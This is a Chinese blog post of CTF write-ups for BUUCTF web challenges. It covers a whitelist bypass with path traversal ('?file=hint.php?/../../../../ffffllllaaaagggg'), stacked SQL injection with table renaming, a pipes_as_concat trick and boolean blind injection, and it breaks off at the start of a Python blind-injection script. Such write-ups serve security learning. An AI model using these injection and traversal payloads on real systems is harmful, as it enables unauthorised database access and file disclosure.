<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>BUUctf平台 | Hexo</title>
  <meta name="description" content="刷的一些题">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUctf平台">
<meta property="og:url" content="http://example.com/2020/06/10/buuctf%E5%88%B7%E9%A2%98/index.html">
<meta property="og:site_name" content="fxxy">
<meta property="og:description" content="刷的一些题">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702202408302.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702202454771.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702203034782.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702204750850.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702210831939.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702210800425.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092133502.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092257405.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092953775.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703093224292.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/vxvcs.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/%7B5_%XG6MTWCGL8%7D0DE2M8JF.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/dsvc.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704110544795.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704111028698.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704111234900.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/sdf.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703165141291.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703165910808.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703175931749.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703180105904.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703182146359.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703190119747.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/fdsvdfgrth.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703191256119.png">
<meta property="og:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/vdfvrtyhg.png">
<meta property="article:published_time" content="2020-06-09T16:00:00.000Z">
<meta property="article:modified_time" content="2021-10-25T05:10:39.210Z">
<meta property="article:author" content="fxxy">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702202408302.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2020/06/10/buuctf%E5%88%B7%E9%A2%98/index.html">
  
    <link rel="alternate" href="/atom.xml" title="fxxy" type="application/atom+xml">
  
  
    <link rel="icon" href="/logo.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="" target="_blank">
          <img class="img-circle img-rotate" src="/images/logo.png" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">fxxy</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">🤔 （安全废物）</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Shanghai, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>力争下游!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/JavaScript/" rel="tag">JavaScript</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker/" rel="tag">docker</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/git/" rel="tag">git</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/vue/" rel="tag">vue</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AD%A6%E4%B9%A0/" rel="tag">学习</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a><span class="tag-list-count">8</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" rel="tag">环境搭建</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B8%A9%E5%9D%91%E8%AE%B0/" rel="tag">踩坑记</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/JavaScript/" style="font-size: 13px;">JavaScript</a> <a href="/tags/ctf/" style="font-size: 13.67px;">ctf</a> <a href="/tags/docker/" style="font-size: 13px;">docker</a> <a href="/tags/git/" style="font-size: 13px;">git</a> <a href="/tags/python/" style="font-size: 13px;">python</a> <a href="/tags/vue/" style="font-size: 13.33px;">vue</a> <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 13px;">学习</a> <a href="/tags/%E5%AE%89%E5%85%A8/" style="font-size: 14px;">安全</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" style="font-size: 13px;">环境搭建</a> <a href="/tags/%E8%B8%A9%E5%9D%91%E8%AE%B0/" style="font-size: 13px;">踩坑记</a>
    </div>
  </div>

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-buuctf刷题" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      BUUctf平台
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/06/10/buuctf%E5%88%B7%E9%A2%98/" class="article-date">
	  <time datetime="2020-06-09T16:00:00.000Z" itemprop="datePublished">2020-06-10</time>
	</a>
</span>
        
        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/ctf/" rel="tag">ctf</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/06/10/buuctf%E5%88%B7%E9%A2%98/#comments" class="article-comment-link">评论</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 2k(字)</span>
	
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>刷的一些题 <span id="more"></span></p>
<h2 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h2><p>f12源码看到source.php </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">emmm</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params">&amp;<span class="variable">$page</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;	<span class="comment">//声明白名单为source.php hint.php</span></span><br><span class="line">            <span class="variable">$whitelist</span> = [<span class="string">&quot;source&quot;</span>=&gt;<span class="string">&quot;source.php&quot;</span>,<span class="string">&quot;hint&quot;</span>=&gt;<span class="string">&quot;hint.php&quot;</span>];</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !is_string(<span class="variable">$page</span>)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">			</span><br><span class="line">            <span class="comment">//截取file字段中，开头到出现?的部分</span></span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="comment">//？在file字段中首次出现的位置</span></span><br><span class="line">                mb_strpos(<span class="variable">$page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = urldecode(<span class="variable">$page</span>);</span><br><span class="line">            </span><br><span class="line">            </span><br><span class="line">            <span class="comment">//</span></span><br><span class="line">            <span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$_page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span> (in_array(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">	</span><br><span class="line">    <span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; is_string(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; emmm::checkFile(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;</span><br><span class="line">    &#125;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>先搞清楚代码，$_REQUEST[‘file’]获取请求中的file查询参数，然后用checkFile()进行检查，是否是hint.php或者source.php，若是这两个php则输出相应内容</p>
<p>利用点在这2个地方</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="comment">//？在file字段中首次出现的位置</span></span><br><span class="line">                mb_strpos(<span class="variable">$page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            </span><br><span class="line"><span class="variable">$_page</span> = mb_substr(</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                mb_strpos(<span class="variable">$_page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br></pre></td></tr></table></figure>

<ul>
<li>mb_substr()：对字符串进行截取</li>
<li>mb_strpos()：查找指定字符串在被查找字符串中<strong>第一次</strong>出现的位置，注意噢！是第一次出现的位置，而且在查找时，他会自动给原字符串的末尾加上?</li>
</ul>
<p>在本地写个demo看一下</p>
<p>正常时：</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702202408302.png" alt="image-20200702202408302"></p>
<p>不正常时：</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702202454771.png" alt="image-20200702202454771"></p>
<p>也就是说，不管我后面会加多少个问号，多少个参数，他最终截取出来比对的，只会是第一个?出现之前的内容，这里可以这样绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=source.php?payload</span><br></pre></td></tr></table></figure>

<p>然后hint.php中说，flag在ffffllllaaaagggg中，下面依次向上便利目录</p>
<p>在第四次的时候出来了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=hint.php?/../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702203034782.png" alt="img"></p>
<h2 id="强网杯-2019-随便注"><a href="#强网杯-2019-随便注" class="headerlink" title="[强网杯 2019]随便注"></a>[强网杯 2019]随便注</h2><ul>
<li><p>注入点:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://07494cc4-964e-492d-82b1-180e7cc2beef.node3.buuoj.cn/?inject=1&#x27; -- -</span><br></pre></td></tr></table></figure></li>
<li><p>字段值为2</p>
</li>
</ul>
<p>但是过滤了一些东西，过滤了select，update，delete，drop，insert，where且大小写绕不过</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702204750850.png" alt="image-20200702204750850"></p>
<ul>
<li>用报错注入试试获取数据库和用户<ul>
<li>数据库：supersqli</li>
<li>用户：root@localhost</li>
</ul>
</li>
</ul>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702210831939.png" alt="image-20200702210831939"></p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200702210800425.png" alt="image-20200702210800425"></p>
<p>过滤了很多关键词，下面不知道怎么办了，然后在山师傅的提醒下，用了堆叠注入。</p>
<p>获取数据库</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092133502.png" alt="image-20200703092133502"></p>
<ul>
<li>获取数据表</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://c9315ef2-a6b3-44c3-b885-430de3fb1477.node3.buuoj.cn/?inject=1&#x27; ; use supersqli; show tables; -- -</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092257405.png" alt="image-20200703092257405"></p>
<ul>
<li>获取字段名</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://c9315ef2-a6b3-44c3-b885-430de3fb1477.node3.buuoj.cn/?inject=1&#x27; ; use supersqli; show columns from words -- -</span><br><span class="line">http://c9315ef2-a6b3-44c3-b885-430de3fb1477.node3.buuoj.cn/?inject=1&#x27; ; use supersqli; show columns from `1919810931114514` -- -</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703092953775.png" alt="image-20200703092953775"></p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703093224292.png" alt="image-20200703093224292"></p>
<p>flag肯定是在1919810931114514这个表里面，但是过滤select又不知道该咋办了，看了一下WP，一种方法是置换表名和列名，因为正常查询的语句肯定为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from word where id = &#x27;&#x27;</span><br></pre></td></tr></table></figure>

<p>那如果我们把存有flag的表名换成word就可用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">alter table words rename to words1;alter table` 1919810931114514` rename to words;alter table words change flag id varchar(50); -- -</span><br></pre></td></tr></table></figure>

<h2 id="SUCTF-2019-EasySQL"><a href="#SUCTF-2019-EasySQL" class="headerlink" title="[SUCTF 2019]EasySQL"></a>[SUCTF 2019]EasySQL</h2><p>过滤字符</p>
<ul>
<li>“ and or order union like</li>
</ul>
<p>堆叠注入</p>
<ul>
<li><p>获取数据库</p>
<ul>
<li>test</li>
<li>ctftraining</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query=1;show databases;</span><br></pre></td></tr></table></figure></li>
</ul>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/vxvcs.png" alt="vxvcs"></p>
<p>本来想一个一个试一下每个数据库中都有哪些表的，但是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query=1;use test;show tables;</span><br></pre></td></tr></table></figure>

<p>这个语句不能执行，那就show一下当前这个数据库有什么表叭</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query=1;show tables;</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/%7B5_%XG6MTWCGL8%7D0DE2M8JF.png" alt="{5_%XG6MTWCGL8}0DE2M8JF"></p>
<p>尝试获取列名称</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show columns from falg</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/dsvc.png" alt="dsvc"></p>
<p>又被过滤了。。。</p>
<p>思考：flag表就在这个数据库下面，说明我们要的东西就在这里，前面测试的时候，不管输入的query是多少，输出的都只有1猜测后端的sql语句为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 1 from flag</span><br></pre></td></tr></table></figure>

<p>我们想得到flag表的内容的话，语句应该为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from flag</span><br></pre></td></tr></table></figure>

<p>构造一下，query=*,1这样语句就会变为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select *,1 from flag</span><br></pre></td></tr></table></figure>

<p>然后成功得到flag</p>
<p>错误</p>
<p>官方WP里的做法是这样的，用了一个sql_mode变量，本来的查询语句应为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select $POST[&#x27;query&#x27;] || flag from flag;</span><br></pre></td></tr></table></figure>

<p>正常的话，他应该是这样</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704110544795.png" alt="image-20200704110544795"></p>
<p>而且前面测试的时候发现，有黑名单过滤输入字符串时会出错，而且输入的正确的东西时，回显的永远是1，那这样上面那个语句也说的通了，如何利用？</p>
<p>mysql中有个sql_mode变量，这个变量有个值，是pipes_as_concat。意思就是将管道符当作连接符，将给定的字符拼接到查询的变量，测试一下</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704111028698.png" alt="image-20200704111028698"></p>
<p>所以，正确解法应该是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query=1;set sql_mode=pipes_as_concat;select 1</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200704111234900.png" alt="image-20200704111234900"></p>
<p>可以看到对1进行了拼接。</p>
<h2 id="极客大挑战-easysql"><a href="#极客大挑战-easysql" class="headerlink" title="极客大挑战 easysql"></a>极客大挑战 easysql</h2><p>注入点在username参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?username=1&#x27; or 1=1 order by 4 -- -</span><br></pre></td></tr></table></figure>

<p>字段数：3</p>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/sdf.png" alt="sdf"></p>
<p>一番测试发现布尔盲注</p>
<p>写脚本注出数据库为geek</p>
<ul>
<li>数据库名</li>
</ul>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703165141291.png" alt="image-20200703165141291"></p>
<ul>
<li>表名</li>
</ul>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703165910808.png" alt="image-20200703165910808"></p>
<p>后来用这个geekusser注列名的时候，折腾了好久都没有，然后在浏览器进行测试的时候，一不小小出来了。。。我把表名改成了geekuser</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://4700bcda-d7ff-4598-a011-d53dff3c4237.node3.buuoj.cn/check.php?username=1&#x27; or 1=1 and if(ascii(substr((select column_name from information_schema.columns where table_name=&#x27;geekuser&#x27; limit 0,1),1,1))&lt;125,1,0) -- - &amp;password=1&#x27; or 1=1</span><br></pre></td></tr></table></figure>

<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703175931749.png" alt="image-20200703175931749"></p>
<p>那让我们正常注一下</p>
<ul>
<li>列名<ul>
<li>id</li>
<li>username</li>
<li>password</li>
</ul>
</li>
</ul>
<p><img src="https://fxxy-blog.oss-cn-hangzhou.aliyuncs.com/image-20200703180105904.png" alt="image-20200703180105904"></p>
<p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">zidian = <span class="string">&#x27;sqwertyuioplkjhgfdsazxcvbnm789456123.0.,/][\;&#123;$%&amp;*()&#125;&#x27;</span></span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1/sqli/Less-6/?id=1&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span 